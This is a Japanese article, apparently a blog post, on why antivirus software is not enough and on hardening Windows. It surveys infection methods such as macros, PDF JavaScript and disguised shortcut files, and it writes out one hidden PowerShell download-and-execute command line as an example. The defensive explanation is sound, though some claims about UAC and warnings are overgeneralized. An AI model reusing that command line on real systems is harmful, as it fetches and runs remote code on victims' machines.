皆さんが普段お使いのPCはどの程度のセキュリティ環境でしょうか？とはいえ、普段使いの場合はそこまでセキュリティのことは考えないか、ウイルス対策ソフトに投げる、という方も多いと思います。しかしながら、最近ではWindowsの標準機能もだいぶ進歩し、それらの機能を”適切”かつ”十分”に設定してやることで、セキュリティソフトの補完をすることができます。また、ウイルス対策ソフトが万能ではないという点も踏まえ、詳細に説明していきます。

◇ ウイルス対策ソフトが万能ではない現実

　「ウイルス対策ソフトが万能ではない」という現実があります。かつての感染手法の多くはウェブサイト上から不審なファイルをダウンロードして実行。マルウェアがペイロードされて常駐する、という事例が多かったのですが、現在は手法が様変わりしました。例えば
・「広告の閉じるボタンをクリックした」だけでzipファイルがダウンロードされる。
・Wordやエクセルに埋め込まれたマクロでペイロード。
・PDF上にJavaScript埋め込み。実行。
高度な例では
・ZIPファイル内のショートカットファイルをWindowsの標準フォルダ画像に偽造。
　├.lnk内部で引数を設定。ex:”powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(…)”
　├マルウェアのペイロード完了。この時はユーザアカウント制御が起動しません。
　├rundll32.exe経由でexplorer.exeやsvchost.exeなどにコードインジェクション
　└マルウェアのペイロード完了
などが挙げられます。特にショートカットファイルを利用したマルウェアのペイロードは、2009年～2015年ごろにかけてrootkit.0accessなどの起動によく用いられていた手法です。
通常の認識であれば、危険なファイルの実行前にWindowsがUACで警告を出すと認識されがちですが、残念ながらPowerShellを引数で呼び出す方法はウイルス警告が作動しません。これらの「抜け道」だけでも、ウイルス対策ソフトが万能ではないことがうかがえたと思います。では、これらの抜け道をどう塞いでいくかを考えていきましょう。